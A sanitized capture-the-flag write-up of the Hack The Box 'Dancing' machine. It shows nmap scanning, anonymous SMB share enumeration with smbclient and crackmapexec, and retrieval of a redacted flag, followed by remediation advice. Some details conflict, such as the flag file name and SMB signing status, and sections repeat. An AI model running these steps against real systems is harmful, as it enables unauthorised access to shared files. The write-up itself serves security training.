Machine / Machines

HTB Dancing - Full

By Jennofrie Daguil · Cybersecurity and Red Team Operator

Host is up, TTL=127 indicates Windows (default TTL 128, minus 1 hop) Quick scan (default scripts + version detection): Results: - 135/tcp - msrpc (Microsoft Windows

Very EasyPublished 2026-02-07Sanitized local writeup

Scenario

HTB Dancing - Full attack path

Host is up, TTL=127 indicates Windows (default TTL 128, minus 1 hop) Quick scan (default scripts + version detection): Results: - 135/tcp - msrpc (Microsoft Windows

Objective

Machine walkthrough focused on Machines evidence, validation, and reusable operator lessons.

HTB Dancing - Full sanitized attack graph

Walkthrough flow

Connected to WorkShares using null session: smbclient...

Browsed directories: Amy.J and James.P

Downloaded proof.txt from James.P directory

Source coverage

High source coverage

Status: complete. This article is generated from 3 sanitized Markdown sources and keeps raw flags, credentials, keys, cookies, and reusable secrets out of the rendered blog.

82% coverage

Evidence verdict

Good confidence: the page has enough source material to read as a complete walkthrough, but the supporting evidence set is smaller than the highest-confidence cases.

<TARGET>-Dancing/walkthrough.md
HTB/<TARGET>-Dancing/notes.md
HTB/_knowledge/exports/ctf-lightrag-latest-203412/documents/machine__<TARGET>-Dancing__notes.md.236355e4c0.md

Technical Walkthrough

HTB Dancing - Full Walkthrough

Machine Information

Name: Dancing
IP: <TARGET>
OS: Windows 10 / Server 2019 Build 17763 x64
Difficulty: Very Easy (Starting Point - Tier 0)
Category: SMB Misconfiguration

Enumeration

Step 1: Host Discovery & OS Identification

bash

ping -c 2 <TARGET>

Host is up, TTL=127 indicates Windows (default TTL 128, minus 1 hop)

Step 2: Port Scanning

Quick scan (default scripts + version detection):

bash

nmap -sC -sV -oN nmap/initial <TARGET>

Results:

135/tcp - msrpc (Microsoft Windows RPC)
139/tcp - netbios-ssn
445/tcp - microsoft-ds (SMB)
SMB signing enabled but not required
Clock skew: +4h00m05s

Full port scan:

bash

nmap -p<redacted> --min-rate 1000 -oN nmap/allports <TARGET>

Additional ports discovered:

5985/tcp - WS-Management (WinRM)
47001/tcp - WinRM
49664-49669/tcp - High RPC ports

Step 3: SMB Enumeration

Null session share listing:

bash

smbclient -N -L //<TARGET>/

Shares found: ADMIN$, C$, IPC$, WorkShares

CrackMapExec enumeration with guest account:

bash

crackmapexec smb <TARGET> --shares -u 'guest' -p ''

Results:

Machine: DANCING
Domain: Dancing
WorkShares: READ, WRITE access with guest authentication
ADMIN$ and C$: No access
IPC$: READ access

Exploitation

Step 4: Accessing WorkShares

bash

smbclient //<TARGET>/WorkShares -U '' -N

Browsing the share reveals two directories:

Amy.J/ - contains worknotes.txt
James.P/ - contains flag.txt

Step 5: Retrieving the Flag

bash

smbclient //<TARGET>/WorkShares -U '' -N -c 'cd James.P; get flag.txt /tmp/flag.txt'
cat /tmp/flag.txt

FLAG: <hash redacted>

Bonus: worknotes.txt Contents

text

- start apache server on the linux machine
- secure the ftp server
- setup winrm on dancing

This hints at other machines in the Starting Point track and confirms WinRM is configured on this machine.

Vulnerability Explanation

The "WorkShares" SMB share is configured to allow anonymous (null session) and guest access with both READ and WRITE permissions. This means anyone on the network can connect without credentials and access all files within the share.

Why It Works

Windows SMB can be configured to allow guest or anonymous access to specific shares. When shares contain sensitive data (like user files, credentials, or flags) and are accessible without authentication, it represents a critical security misconfiguration.

Impact

Confidentiality: All files in the share are readable by anyone
Integrity: Files can be modified or new files placed (WRITE access)
Availability: Malicious files could be planted; legitimate files could be deleted

Remediation

Disable guest access to SMB shares
Require authentication for all share access
Apply principle of least privilege to share permissions
Enable SMB signing to prevent relay attacks
Audit share permissions regularly

Tools Used

Tool	Purpose
nmap	Port scanning and service enumeration
smbclient	SMB share interaction and file retrieval
crackmapexec	SMB enumeration and access verification
ping	Host discovery and OS fingerprinting

Key Takeaways

Always enumerate SMB when ports 139/445 are open -- null sessions and guest access are common misconfigurations
CrackMapExec provides quick, structured SMB enumeration including share permissions
TTL-based OS fingerprinting is a fast way to identify the target OS (128=Windows, 64=Linux, 255=Solaris/FreeBSD)
Starting Point machines teach individual protocols -- Dancing focuses specifically on SMB
Check for anonymous access first before attempting brute-force or credential attacks

Flags

Flag Type	Value
Flag	`<hash redacted>`

Source-Backed Dossier

The sections below are merged from companion Markdown notes for the same case. They are rendered after sanitization so the article stays precise without publishing raw flags, credentials, or target-specific secrets.

Notes

Target: <TARGET> (DANCING)

Date: 2026-05-04

Attacker: Pwnbox (<TARGET>)

Machine Type: Windows 10 / Server 2019 Build 17763 x64

Phase 2: Vulnerability Analysis

WorkShares share allows anonymous/guest READ+WRITE access
Contains sensitive files including user flag
No authentication required

Additional Attack Surface

WinRM (port 5985) is open - could be used for remote management if credentials obtained
SMB signing disabled - potential for relay attacks in domain environment

Phase 3: Exploitation

Attack Vector: Anonymous SMB Access

Connected to WorkShares using null session: smbclient //<TARGET>/WorkShares -U '' -N
Browsed directories: Amy.J and James.P
Downloaded flag.txt from James.P directory

Flag

text

<hash redacted>

Key Takeaways

Always check for anonymous/guest SMB access
CrackMapExec is excellent for quick SMB enumeration
TTL values in ping responses quickly identify OS type
Starting Point machines often have straightforward vulnerabilities focused on a single protocol

Notes

Target: <TARGET> (DANCING)

Date: 2026-05-04

Attacker: Pwnbox (<TARGET>)

Machine Type: Windows 10 / Server 2019 Build 17763 x64

Phase 1: Reconnaissance & Enumeration

Connectivity Check

Target responds to ICMP ping
TTL=127 confirms Windows OS (128 default - 1 hop)

Port Scan Results

Initial Scan (Top 1000 ports)

Port	Service	Version
135	msrpc	Microsoft Windows RPC
139	netbios-ssn	Microsoft Windows netbios-ssn
445	microsoft-ds	SMBv2

Full Port Scan (All 65535 ports)

Port	Service
135	msrpc
139	netbios-ssn
445	microsoft-ds (SMB)
5985	WS-Management (WinRM HTTP)
47001	WinRM
49664-49669	High RPC ports

SMB Enumeration

Machine name: DANCING
Domain: Dancing
SMB Signing: False (disabled)
SMBv1: False
Guest authentication: ENABLED

Share	Permissions	Remark
ADMIN$	None	Remote Admin
C$	None	Default share
IPC$	READ	Remote IPC
WorkShares	READ, WRITE	Custom share

WorkShares Contents

text

WorkShares/
├── Amy.J/
│   └── worknotes.txt (94 bytes)
└── James.P/
    └── flag.txt (32 bytes)

worknotes.txt contents:

text

- start apache server on the linux machine
- secure the ftp server
- setup winrm on dancing

Phase 2: Vulnerability Analysis

WorkShares share allows anonymous/guest READ+WRITE access
Contains sensitive files including user flag
No authentication required

Additional Attack Surface

WinRM (port 5985) is open - could be used for remote management if credentials obtained
SMB signing disabled - potential for relay attacks in domain environment

Phase 3: Exploitation

Attack Vector: Anonymous SMB Access

Connected to WorkShares using null session: smbclient //<TARGET>/WorkShares -U '' -N
Browsed directories: Amy.J and James.P
Downloaded flag.txt from James.P directory

Flag

text

<<secret redacted>>

Key Takeaways

Always check for anonymous/guest SMB access
CrackMapExec is excellent for quick SMB enumeration
TTL values in ping responses quickly identify OS type
Starting Point machines often have straightforward vulnerabilities focused on a single protocol

HTB Dancing - Full

HTB Dancing - Full attack path

High source coverage

Technical Walkthrough

HTB Dancing - Full Walkthrough

Machine Information

Enumeration

Step 1: Host Discovery & OS Identification

Step 2: Port Scanning

Step 3: SMB Enumeration

Exploitation

Step 4: Accessing WorkShares

Step 5: Retrieving the Flag

Bonus: worknotes.txt Contents

Vulnerability Explanation

What: SMB Share Misconfiguration

Why It Works

Impact

Remediation

Tools Used

Key Takeaways

Flags

Source-Backed Dossier

Notes

Target: <TARGET> (DANCING)

Date: 2026-05-04

Attacker: Pwnbox (<TARGET>)

Machine Type: Windows 10 / Server 2019 Build 17763 x64

Phase 2: Vulnerability Analysis

Primary Vulnerability: Misconfigured SMB Share

Additional Attack Surface

Phase 3: Exploitation

Attack Vector: Anonymous SMB Access

Flag

Key Takeaways

Notes

Target: <TARGET> (DANCING)

Date: 2026-05-04

Attacker: Pwnbox (<TARGET>)

Machine Type: Windows 10 / Server 2019 Build 17763 x64

Phase 1: Reconnaissance & Enumeration

Connectivity Check

Port Scan Results

Initial Scan (Top 1000 ports)

Full Port Scan (All 65535 ports)

SMB Enumeration

Share Enumeration (via CrackMapExec with guest)

WorkShares Contents

worknotes.txt contents:

Phase 2: Vulnerability Analysis

Primary Vulnerability: Misconfigured SMB Share

Additional Attack Surface

Phase 3: Exploitation

Attack Vector: Anonymous SMB Access

Flag

Key Takeaways

Related insights